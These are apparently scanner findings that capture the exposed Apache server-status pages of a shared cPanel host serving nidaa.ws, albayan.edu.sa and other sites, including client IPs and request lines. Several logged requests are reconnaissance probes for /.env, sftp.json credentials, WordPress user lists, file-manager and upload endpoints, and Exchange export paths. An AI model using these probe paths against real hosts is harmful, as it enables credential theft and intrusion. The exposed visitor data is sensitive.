      2.1618912530291190.054.1454.14
      5.110.21.53http/1.1
      
      1-0295300/18/18_
      2.72455010.00.760.76
      5.110.21.53http/1.1alezdhar.com:443GET /videos/Zed-450-1.mp4 HTTP/1.1
      Found on 2024-05-23 02:33
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df79632905e

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Thursday, 16-May-2024 00:57:15 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 14
      Parent Server MPM Generation: 13
      Server uptime:  16 days 4 hours 20 minutes 31 seconds
      Server load: 0.36 0.27 0.21
      Total accesses: 2134768 - Total Traffic: 491.4 GB - Total Duration: 5327328563
      CPU Usage: u630.48 s26.6 cu9191.94 cs2738.04 - .9% CPU load
      1.53 requests/sec - 368.5 kB/second - 241.3 kB/request - 2495.51 ms/request
      40 requests currently being processed, 0 workers gracefully restarting, 85 idle workers
      ........................._K__________KK_K_K____KKK..............
      ................................................................
      ......................KK___________WKKK_K_K_____________CR___KKK
      _K___W__K_________WR__K___K___KKKK_K____R___KK__K______KKK......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-12-0/0/12341.
      0.00574274193290.00.002813.40
      195.191.219.131http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1220&t=144.76.120.197&c=5 HTT
      
      0-12-0/0/12301.
      0.00570194278150.00.002390.17
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1219&t=144.76.81.229&c=5 HTTP
      
      0-12-0/0/12564.
      0.00570260345800.00.003172.84
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1285&t=148.251.69.139&c=5 HTT
      
      0-12-0/0/12372.
      0.005723239175120.00.003068.11
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D8%AE%D8%A
      
      0-12-0/0/11893.
      0.005754215186680.00.002649.58
      4.242.218.139http/1.1daris.live:80GET /files HTTP/1.1
      
      0-12-0/0/11563.
      0.00571613487280.00.003312.44
      172.70.115.135http/1.1nidaa.ws:80GET /.well-known/pki-validation/807A888B253E7AF7A80C419531042AC
      
      0-12-0/0/11728.
      0.005716524278978030.00.002779.03
      142.247.104.109http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-12-0/0/11971.
      0.00570236109230.00.003245.18
      217.113.194.253http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=69&t=217.113.194.99&c=5 HTTP
      
      0-12-0/0/12153.
      0.0057231152649380.00.002922.49
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D8%AE%D8%A
      
      0-12-0/0/11910.
      0.005724923219347290.00.002569.33
      142.247.104.109http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-12-0/0/12275.
      0.00573115288193900.00.003245.40
      82.167.92.141http/1.1albayan.edu.sa:443GET /imgweb/cur1438/3/matst1.pdf HTTP/1.1
      
      0-12-0/0/12139.
      0.00570354766250.00.003389.99
      51.83.238.93http/1.13dvi.com:80GET /wp-content/themes/twentystd/ HTTP/1.1
      
      0-12-0/0/11623.
      0.00570239537860.00.002575.40
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1330&t=65.108.0.71&c=5 HTTP/1
      
      0-12-0/0/11940.
      0.00570252518190.00.002597.20
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=167.114.64.97&c=5 HTTP
      
      0-12-0/0/12254.
      0.00570268151570.00.002915.74
      172.70.251.81http/1.1nidaa.ws:80GET /.well-known/pki-validation/807A888B253E7AF7A80C419531042AC
      
      0-12-0/0/12083.
      0.0057428216132000.00.002999.67
      192.30.83.56http/1.1sulaimaniya.edu.sa:443GET / HTTP/1.1
      
      0-12-0/0/11804.
      0.00570217896260.00.002492.98
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=195.191.219.131&c=5 HT
      
      0-12-0/0/12118.
      0.00573314459940.00.002891.96
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1715810093.29975795745849609375
      
      0-12-0/0/11690.
      0.00579242255040.00.002988.46
      217.113.194.243http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=1903 HTTP/1.1
      
      0-12-0/0/11413.
      0.005725233701940.00.002812.87
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file44/%D8%AA%D9%86%D8%B6%D8%A8%D8%A7%D8%B7%20%D8%A
      
      0-12-0/0/12034.
      0.00570213129150.00.002596.11
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1219&t=195.191.219.130&c=5 HT
      
      0-12-0/0/12235.
      0.00573245745600.00.002606.05
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1298&t=65.108.0.71&c=5 HTTP/1
      
      0-12-0/0/11860.
      0.00570327135340.00.003006.13
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1300&t=3.239.192.241&c=5 HTTP
      
      0-12-0/0/11504.
      0.005758228349180.00.003177.30
      4.242.218.139http/1.1daris.live:80GET /uploads HTTP/1.1
      
      0-12-0/0/12982.
      0.00570359144230.00.002894.29
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=194.247.173.99&c=5 HTT
      
      1-1336270/1/12588_
      0.021024275595750.00.132468.80
      139.59.132.8http/1.1
      
      1-13362725/25/12124K
      0.33252294531921.30.023009.38
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1251&t=195.191.219.133&c=5 HT
      
      1-1336270/2/11880_
      0.04100270582610.00.003062.14
      167.99.210.137http/1.1
      
      1-1336270/3/11403_
      0.27785965233820.00.012715.43
      139.59.132.8http/1.1albayan.akgsa.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-1336270/1/11546_
      0.041025276409880.00.182766.30
      167.99.210.137http/1.1
      
      1-1336270/2/12601_
      0.26782366247690.00.153107.12
      139.59.132.8http/1.1albayan.akgsa.com:443GET /about HTTP/1.1
      
      1-1336270/2/12305_
      0.29614627584115
      Found on 2024-05-15 21:57
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df76b9c4078

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Monday, 13-May-2024 02:53:20 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 12
      Parent Server MPM Generation: 11
      Server uptime:  13 days 6 hours 16 minutes 35 seconds
      Server load: 0.46 0.44 0.42
      Total accesses: 1634011 - Total Traffic: 408.6 GB - Total Duration: 4296928531
      CPU Usage: u555.65 s31.64 cu7118.03 cs2167.81 - .862% CPU load
      1.43 requests/sec - 374.0 kB/second - 262.2 kB/request - 2629.68 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 141 idle workers
      _K_______________________.......................................
      ...........______K__________________............................
      ................................................................
      ................................._____________________W__K______
      ________K_______W_____________K_____W______________K____________
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-11154900/41/8885_
      7.851066385183008570.05.942034.50
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154901/52/9132K
      7.9900138924570.85.501939.85
      172.70.246.110http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-11154900/49/9228_
      7.86813193594600.010.222525.43
      164.90.228.79http/1.1abu-helal.com:80GET / HTTP/1.1
      
      0-11154900/64/9347_
      7.981279181017980.029.832480.58
      206.189.225.181http/1.1trynidaa.com:80GET /server HTTP/1.1
      
      0-11154900/33/8581_
      7.981076157418770.00.802188.93
      c8021b81a5.scan.leakix.orghttp/1.1trynidaa.com:80GET /server-status HTTP/1.1
      
      0-11154900/59/8547_
      7.841131537232370.03.322525.23
      139.162.141.82http/1.1durratalkhamis.alnwisher.com:44GET /v2/_catalog HTTP/1.1
      
      0-11154900/48/8594_
      7.851126380200102260.022.052304.99
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154900/66/8827_
      7.87791159922820.03.182463.36
      164.90.228.79http/1.1abu-helal.com:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-11154900/43/8658_
      7.927711068158560.011.342448.09
      164.90.228.79http/1.1abu-helal.com:80GET /.DS_Store HTTP/1.1
      
      0-11154900/45/8895_
      7.851111163767100.023.032052.35
      139.162.141.82http/1.1durratalkhamis.alnwisher.com:44GET /.env HTTP/1.1
      
      0-11154900/34/8982_
      7.78540232506710.012.782527.64
      199.45.154.49http/1.1
      
      0-11154900/91/8842_
      7.6511815275943200.01.152775.51
      31.167.129.36http/1.1
      
      0-11154900/46/8455_
      7.831333153461750.01.132086.73
      5.82.222.187http/1.1zed.sa:443GET /menu/wp-content/plugins/elementor/assets/js/frontend-modul
      
      0-11154900/46/8572_
      7.981583807182248980.03.762127.25
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154900/36/9024_
      7.927676171346860.036.112290.41
      fee8d5bfdc.scan.leakix.orghttp/1.1abu-helal.com:80GET /server-status HTTP/1.1
      
      0-11154900/32/8897_
      7.98260155497900.010.302434.56
      54.36.148.251http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=707&t=54.36.149.7&c=5 HTTP/1.
      
      0-11154900/55/8807_
      7.98631162121780.09.952056.74
      164.90.228.79http/1.1akgsa.com:443GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-11154900/55/8807_
      7.99871243751730.03.122426.66
      206.189.225.181http/1.1trynidaa.com:80GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-11154900/44/8481_
      7.041463192422600.055.602501.77
      139.162.141.82http/1.1
      
      0-11154900/88/8298_
      7.43766241176790600.05.442249.36
      164.90.228.79http/1.1
      
      0-11154900/31/8944_
      7.231463148974260.01.452134.55
      139.162.141.82http/1.1
      
      0-11154900/61/8747_
      7.801340185772410.03.842098.37
      66.249.64.10http/1.1albayan.edu.sa:80GET /albayan_library/BooksVi.php?b=1327 HTTP/1.1
      
      0-11154900/54/8843_
      7.92641242370580.067.382450.23
      164.90.228.79http/1.1akgsa.com:443GET /server HTTP/1.1
      
      0-11154900/38/8467_
      7.801492168550290.054.132319.64
      17.241.219.146http/1.1albayan.edu.sa:443GET /e_sch/css/theme.css HTTP/1.1
      
      0-11154900/60/9327_
      7.976446287961400.04.252441.55
      fee8d5bfdc.scan.leakix.orghttp/1.1akgsa.com:443GET /server-status HTTP/1.1
      
      1-10-0/0/9672.
      0.0068430223196690.00.002141.29
      96.126.110.74http/1.1sradmin.3dvi.com:80GET /_all_dbs HTTP/1.1
      
      1-10-0/0/9222.
      0.0068436011198297800.00.002652.31
      159.89.127.165http/1.1
      
      1-10-0/0/9332.
      0.0068430210437960.00.002502.41
      159.223.132.86http/1.1php.we3dvi.com:80\x16\x03\x01\x01\x03\x01
      
      1-10-0/0/8683.
      0.00684323921341590.00.002348.91
      167.71.175.236http/1.1proxy-subdomains-vhost.localhosGET /_all_dbs HTTP/1.1
      
      1-10-0/0/8892.
      0.00684323212342160.00.002163.56
      195.191.219.132http/1.1albayan.edu.sa:443GET /imgweb/1445/%D9%85%D8%AC%D8%A7%D9%84%D8%A7%D8%AA%20%D8%A5%
      
      1-10-0/0/9419.
      0.006843472332053540.00.002792.29
      168.149.96.57http/1.1zed.sa:443GET /menu/wp-content/uploads/2023/06/65-Zed-BrandGuideline-Apri
      
      1-10-0/0/9629.
      0.0068431225489210.00.002391.55
      159.223.132.86http/1.1sradmin.3dvi.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-10-0/0/9461.
      0.0068430180598740.00.002111.73
      167.99.210.137http/1.1
      
      1-10-0/0/9052.
      0.0068431209983770.00.002473.59
      164.92.107.174http/1
      Found on 2024-05-12 23:52
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7b5fff6b3

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Monday, 13-May-2024 01:45:35 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 12
      Parent Server MPM Generation: 11
      Server uptime:  13 days 5 hours 8 minutes 50 seconds
      Server load: 0.51 0.51 0.50
      Total accesses: 1630705 - Total Traffic: 407.8 GB - Total Duration: 4286034178
      CPU Usage: u537.51 s26.98 cu7118.03 cs2167.81 - .863% CPU load
      1.43 requests/sec - 374.5 kB/second - 262.2 kB/request - 2628.33 ms/request
      7 requests currently being processed, 0 workers gracefully restarting, 143 idle workers
      _________________________.......................................
      ...........__________________W______............................
      ................................................................
      .................................________K_____________________K
      _________________W________________K_____________________K_K_____
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-11154900/26/8870_
      4.44191181182225660.04.642033.20
      37.107.8.160http/1.1albayan.edu.sa:443GET /imgweb/bankrop6.pdf HTTP/1.1
      
      0-11154900/26/9106_
      4.545726138026950.02.871937.23
      123.126.50.34http/1.1garndhabi.org:80GET / HTTP/1.1
      
      0-11154900/33/9212_
      4.54443191973930.09.002524.22
      54.36.149.88http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=429 HTTP/1.1
      
      0-11154900/48/9331_
      4.402191178644000.02.412453.16
      162.158.146.105http/1.1adyar.com.sa:80GET /assets/fonts/font-awesome/webfonts/fa-brands-400.woff2 HTT
      
      0-11154900/16/8564_
      4.471110155984810.00.412188.54
      5.82.109.163http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-11154900/18/8506_
      4.5533224537200640.00.712522.62
      46.251.145.129http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/______%20__________
      
      0-11154900/28/8574_
      4.471130197512360.01.412284.35
      54.36.149.89http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=752&t=54.36.148.107&c=5 HTTP/
      
      0-11154900/35/8796_
      4.4518815650159656190.01.342461.52
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154900/31/8646_
      4.56211067728700.011.112447.87
      136.243.36.230http/1.1daris.live:443GET /assets/default/vendor/onloader/js/jquery.oLoader.min.js HT
      
      0-11154900/27/8877_
      4.561218163066340.00.762030.08
      54.36.149.80http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=432 HTTP/1.1
      
      0-11154900/18/8966_
      4.49924232479080.07.972522.83
      54.36.148.238http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=421 HTTP/1.1
      
      0-11154900/79/8830_
      4.54547911275575310.00.772775.13
      159.0.27.179http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-11154900/20/8429_
      4.431921153055750.00.702086.30
      207.154.197.113http/1.1abu-helal.com:443GET /.vscode/sftp.json HTTP/1.1
      
      0-11154900/25/8551_
      4.441881178968600.01.682125.16
      207.154.197.113http/1.1abu-helal.com:443GET /.env HTTP/1.1
      
      0-11154900/19/9007_
      4.441883170058310.027.642281.93
      207.154.197.113http/1.1abu-helal.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      0-11154900/17/8882_
      4.4516011154704520.01.642425.90
      54.36.149.78http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=330 HTTP/1.1
      
      0-11154900/36/8788_
      4.4711450161371410.09.612056.39
      82.165.215.24http/1.13dvi.com:443GET /wp-login.php HTTP/1.1
      
      0-11154900/19/8771_
      4.50722243165470.01.022424.56
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-11154900/21/8458_
      4.301960190877820.030.012476.18
      207.154.197.113http/1.1
      
      0-11154900/47/8257_
      4.48101323175795790.04.382248.30
      5.82.109.163http/1.1albayan.edu.sa:443GET /imgweb/vat.jpg HTTP/1.1
      
      0-11154900/18/8931_
      4.508356148822790.01.352134.46
      136.243.36.230http/1.13dvi.com:443GET / HTTP/1.1
      
      0-11154900/48/8734_
      4.54532185190460.03.382097.91
      143.58.212.225http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      0-11154900/33/8822_
      4.291974242108440.066.572449.42
      207.154.197.113http/1.1
      
      0-11154900/25/8454_
      4.461313499167500150.054.052319.56
      188.54.121.15http/1.1albayan.edu.sa:443GET /imgweb/file44/1390fe3a-GE-ME-K08-SM2-MATH.pdf HTTP/1.1
      
      0-11154900/22/9289_
      4.5711287179360.01.792439.09
      136.243.36.230http/1.1daris.live:443GET /assets/default/vendor/bootstrap-tagsinput/bootstrap-tagsin
      
      1-10-0/0/9672.
      0.0027780223196690.00.002141.29
      96.126.110.74http/1.1sradmin.3dvi.com:80GET /_all_dbs HTTP/1.1
      
      1-10-0/0/9222.
      0.0027786011198297800.00.002652.31
      159.89.127.165http/1.1
      
      1-10-0/0/9332.
      0.0027780210437960.00.002502.41
      159.223.132.86http/1.1php.we3dvi.com:80\x16\x03\x01\x01\x03\x01
      
      1-10-0/0/8683.
      0.00277823921341590.00.002348.91
      167.71.175.236http/1.1proxy-subdomains-vhost.localhosGET /_all_dbs HTTP/1.1
      
      1-10-0/0/8892.
      0.00277823212342160.00.002163.56
      195.191.219.132http/1.1albayan.edu.sa:443GET /imgweb/1445/%D9%85%D8%AC%D8%A7%D9%84%D8%A7%D8%AA%20%D8%A5%
      
      1-10-0/0/9419.
      0.002778472332053540.00.002792.29
      168.149.96.57http/1.1zed.sa:443GET /menu/wp-content/uploads/2023/06/65-Zed-BrandGuideline-Apri
      
      1-10-0/0/9629.
      0.0027781225489210.00.002391.55
      159.223.132.86http/1.1sradmin.3dvi.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-10-0/0/9461.
      0.0027780180598740.00.002111.73
      
      Found on 2024-05-12 22:45
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7bc0b2703

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Wednesday, 08-May-2024 17:52:25 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  8 days 21 hours 15 minutes 41 seconds
      Server load: 0.22 0.31 0.31
      Total accesses: 1002001 - Total Traffic: 283.2 GB - Total Duration: 2528812383
      CPU Usage: u687.72 s104.86 cu4171.57 cs1301.22 - .816% CPU load
      1.31 requests/sec - 386.8 kB/second - 296.4 kB/request - 2523.76 ms/request
      15 requests currently being processed, 0 workers gracefully restarting, 110 idle workers
      ........................._______K_____K____W______W___W____W____
      __W_____W________K__________________________________W____WW__R__
      __________W_________K_..........................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9-0/0/5054.
      0.00202403278328160.00.001280.26
      209.38.28.122http/1.1akg.sa:443GET /plugins/jquery-file-upload/server/php HTTP/1.1
      
      0-9-0/0/5439.
      0.0020240707966064770.00.001060.19
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-9-0/0/5566.
      0.0020240135481551330.00.001895.43
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-9-0/0/5244.
      0.0020240180218680.00.001816.48
      31.167.72.252http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-9-0/0/4871.
      0.00202401953428940.00.001456.66
      209.38.28.122http/1.1akg.sa:443GET /assets/vendor/jquery.filer/php/readme.txt HTTP/1.1
      
      0-9-0/0/4720.
      0.00202400405059860.00.001702.31
      209.38.28.122http/1.1akg.sa:80GET /assets/color_admin/plugins/jquery-file-upload/server/php/ 
      
      0-9-0/0/4838.
      0.00202400123630730.00.001759.58
      209.38.28.122http/1.1akg.sa:80GET /filemanager/filemanager/dialog.php HTTP/1.1
      
      0-9-0/0/4928.
      0.0020240088320750.00.001740.59
      209.38.28.122http/1.1akg.sa:80GET /.env HTTP/1.1
      
      0-9-0/0/4949.
      0.0020240152976460860.00.001676.04
      31.167.168.136http/1.1albayan.edu.sa:443GET /images/albayan-new.jpg HTTP/1.1
      
      0-9-0/0/5251.
      0.0020240280863987420.00.001260.27
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-9-0/0/5336.
      0.0020240099603160.00.001836.75
      209.38.28.122http/1.1akg.sa:80GET /tinymce/filemanager/dialog.php HTTP/1.1
      
      0-9-0/0/5364.
      0.00202400156600960.00.001959.62
      31.167.119.169http/1.1albayan.edu.sa:80GET /web.html HTTP/1.1
      
      0-9-0/0/4976.
      0.00202403479693080.00.001201.90
      209.38.28.122http/1.1akg.sa:443GET /assets/jquery-file-upload/server/php HTTP/1.1
      
      0-9-0/0/4650.
      0.00202402392539780.00.001491.85
      209.38.28.122http/1.1akg.sa:443GET /assets/scripts/filemanager/dialog.php HTTP/1.1
      
      0-9-0/0/5179.
      0.0020240080775620.00.001579.90
      209.38.28.122http/1.1akg.sa:80GET /lib/jquery-file-upload/server/php/ HTTP/1.1
      
      0-9-0/0/5363.
      0.00202403475839710.00.001712.79
      209.38.28.122http/1.1akg.sa:443GET /assets/vendor_admin/plugins/jquery-file-upload/server/php 
      
      0-9-0/0/5182.
      0.00202401768400230.00.001388.50
      209.38.28.122http/1.1akg.sa:443GET /assets/elfinder/elfinder.html HTTP/1.1
      
      0-9-0/0/5154.
      0.00202403144615970.00.001828.40
      31.167.72.252http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      0-9-0/0/4912.
      0.0020240079466060.00.001628.39
      209.38.28.122http/1.1akg.sa:80GET /coaster/jquery/gallery-upload/server/php/ HTTP/1.1
      
      0-9-0/0/4844.
      0.0020240271137750.00.001497.68
      31.167.168.136http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-9-0/0/5164.
      0.00202401967219270.00.001424.18
      209.38.28.122http/1.1akg.sa:443GET /assets/admin/js/tinymce/plugins/filemanager/dialog.php HTT
      
      0-9-0/0/4979.
      0.002024075678612090.00.001481.35
      82.167.41.119http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      0-9-0/0/4844.
      0.00202404266138512930.00.001279.71
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-9-0/0/4826.
      0.0020240267664339280.00.001484.19
      103.166.59.117http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-9-0/0/5638.
      0.00202400166353820.00.001933.05
      66.249.64.8http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=1253&l_n=1&page=1 HTTP
      
      1-9209680/641/5379_
      89.65384118842380.0129.301574.68
